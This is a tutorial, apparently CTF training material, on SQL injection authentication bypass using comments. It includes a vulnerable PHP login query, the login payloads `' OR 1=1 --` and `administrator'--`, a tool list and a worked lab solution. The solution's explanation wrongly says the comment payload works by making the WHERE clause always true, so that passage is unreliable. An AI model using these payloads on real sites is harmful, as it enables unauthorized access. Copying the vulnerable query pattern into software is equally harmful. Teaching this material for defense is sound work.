Authentication By-Pass

Introduction

Authentication bypass using SQL injection comments is a technique where attackers manipulate the login query of a web application to gain unauthorized access. By injecting SQL commands, particularly comments, into login fields, attackers can trick the system into validating their access without needing valid credentials.

Table of Contents

• SQL Injection: Authentication Bypass Using Comments

  • Introduction

  • Table of Contents

  • How to identify

  • Code/tools/websites

    • Tools

    • Websites

  • Sample problem

    • Problem Statement

    • Solution

  • References

  • Conclusion

How to identify

To identify vulnerabilities that allow authentication bypass via SQL injection using comments, pay attention to how the application handles user inputs in login forms. Indicators include:

1. Login Page: Often these are a good candidate for authentication bypass due to improper handling/sanitization of inputs.

2. Error Messages: Look for SQL syntax errors when inputting certain characters like single quotes (').

3. Behavior Testing: Enter typical SQL injection patterns to see if the application responds abnormally, such as logging in without correct credentials. Example:

Username: ' OR 1=1 --
Password: [any_password]

1. Code Analysis: Check the backend code for direct use of user inputs in SQL queries without proper sanitization.

Here is an example of a vulnerable PHP code snippet:

<?php
$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysqli_query($conn, $query);
if(mysqli_num_rows($result) > 0) {
    // Login successful
} else {
    // Login failed
}
?>

Code/tools/websites

Tools

• SQLMap: An automated tool for SQL injection and database takeover.

• Burp Suite: A web vulnerability scanner with tools for manual testing.

• Havij: An automated SQL injection tool.

Websites

https://web.ctflearn.com/web4/ (Easy)

https://ctf.hackthebox.com/

Sample problem

Problem Statement

You are given access to a web application with a login form. The page contains a login form with a username and password field.

Identify if the application is vulnerable to SQL injection authentication bypass and log in without valid credentials.

Link to lab

Solution

Click to reveal the solution

You can manipulate the SQL query by making the WHERE clause to always evaluate to true.

• Manipulating the Username Input: Instead of providing a valid username, you can input the as administrator'--. This works as follows:

  • We use the username administrator and close the field using '.

  • The -- comments out the rest of the query, effectively ignoring the password check.

• Resulting SQL Query: In the backend, when combined with the original query, it would look like this:

  SELECT * FROM `users` WHERE `username` = 'administrator'--' AND `password` = '';

• This modified query causes the database to return all records because the WHERE clause is always true due to the true condition. As a result, the authentication check is bypassed, allowing you to log in without knowing the correct password.

This technique leverages the fact that SQL interprets certain sequences of characters as commands, such as -- for commenting out the rest of the line, and OR true for creating a condition that always evaluates to true.

References

• OWASP SQL Injection

• PortSwigger Web Security Academy

• SQLMap Documentation

Conclusion

Authentication bypass using SQL injection comments is a common attack vector that exploits poorly sanitized user inputs. Identifying and mitigating these vulnerabilities involves careful input validation and the use of parameterized queries.